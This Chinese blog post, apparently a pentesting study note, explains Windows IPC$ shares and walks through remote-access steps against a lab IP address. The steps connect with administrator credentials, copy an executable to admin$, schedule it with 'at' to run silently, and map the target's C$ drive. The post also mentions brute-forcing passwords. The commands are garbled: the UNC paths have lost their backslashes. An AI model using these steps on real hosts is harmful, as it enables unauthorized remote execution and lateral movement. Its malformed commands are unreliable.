前言
最近在看一些渗透测试的教程。打算把一些东西实践实践,加深一下印象!
今天就来看看IPC连接。虽然很老,但是很经典。
正文
什么是IPC?
IPC(Internet Process Connection)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。
IPC$ (Internet Process Connection)国人叫他共享"命名管道"资源服务。
其实看原始英文名称我们能更好的理解他的用途和作用。
IPC$就是为“进程”间建立网络连接而存在的服务
说的再明确点就是:IPC$是一个为“各类进程”建立网络通信连接而存在的服务
ipc利用
1.windows server 2003 与 windows xp ipc连接无需密码即可建立连接
2.暴力破解windows 密码,执行远程主机命令,获取主机权限
一、建立IPC连接
在CMD下输入以下命令:
net use \192.168.0.100ipc$ "password" /user:"administrator"
二、通过IPC传文件
在CMD下输入以下命令:
假如我要传的文件是putty.exe,admin$表示C:WINDOWS目录
copy putty.exe \192.168.0.100admin$
三、通过IPC查看对方电脑时间
在CMD下输入以下命令:
net time \192.168.0.100
四、定时运行程序
在CMD下输入以下命令:
at \192.168.0.100 19:45 putty.exe
五、确认是否启动
居然还是静默运行的。只能在任务管理器中看到的。
六、将靶机C盘文件映射到本地
在CMD下输入以下命令:
net use Z: \192.168.0.100c$
七、断开IPC连接
在CMD下输入以下命令:
net use \192.168.0.100 /del
————————————————
版权声明:本文为CSDN博主「看不尽的尘埃」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/weixin_42936566/article/details/86555918